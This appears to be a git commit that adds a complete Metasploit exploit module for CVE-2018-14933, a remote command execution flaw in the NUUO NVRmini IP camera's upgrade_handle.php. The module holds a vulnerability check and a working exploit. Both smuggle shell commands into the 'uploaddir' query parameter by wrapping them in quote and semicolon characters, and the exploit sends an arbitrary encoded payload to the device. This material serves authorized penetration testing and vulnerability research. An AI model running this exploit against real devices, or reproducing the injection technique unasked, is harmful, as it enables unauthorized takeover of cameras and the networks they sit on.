Land #11072, Add nuuo_nvrmini_upgrade_rce

2019-02-06 22:30:45 -06:00 · 2019-02-06 22:30:45 -06:00 · 3a12592976
parent e89e29170f c8d79cb7c0
commit 3a12592976
1 changed files with 87 additions and 0 deletions
--- a/modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb
+++ b/modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb
@ -0,0 +1,87 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'NUUO NVRmini upgrade_handle.php Remote Command Execution',
+      'Description' => %q{
+        This exploits a vulnerability in the web application of NUUO NVRmini IP camera,
+        which can be done by triggering the writeuploaddir command in the upgrade_handle.php file.
+      },
+      'License' => MSF_LICENSE,
+      'Author'  =>
+        [
+          'Berk Dusunur', # @berkdusunur
+          'numan turle'   # @numanturle
+        ],
+      'References' =>
+        [
+          ['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'],
+          ['URL', 'https://www.tenable.com/security/research/tra-2018-41'],
+          ['CVE', '2018-14933'],
+          ['EDB', '45070']
+        ],
+      'Privileged'   => false,
+      'Payload'      =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'       => %w{ unix win linux },
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [ ['NUUO NVRmini', { }], ],
+      'DisclosureDate' => 'Aug 04 2018',
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'upgrade_handle.php'),
+      'vars_get' =>
+        {
+          'cmd' => 'writeuploaddir',
+          'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'"
+        }}
+      )
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    if res.code == 200 && res.body =~ /upload_tmp_dir/
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
+  end
+
+  def http_send_command(cmd)
+    uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php")
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      =>  uri,
+      'vars_get' =>
+        {
+          'cmd' => 'writeuploaddir',
+          'uploaddir' => "';"+cmd+";'"
+        }}
+      )
+
+    unless res
+      fail_with(Failure::Unknown, 'Failed to execute the command.')
+    end
+
+    res
+  end
+
+  def exploit
+    http_send_command(payload.encoded)
+  end
+end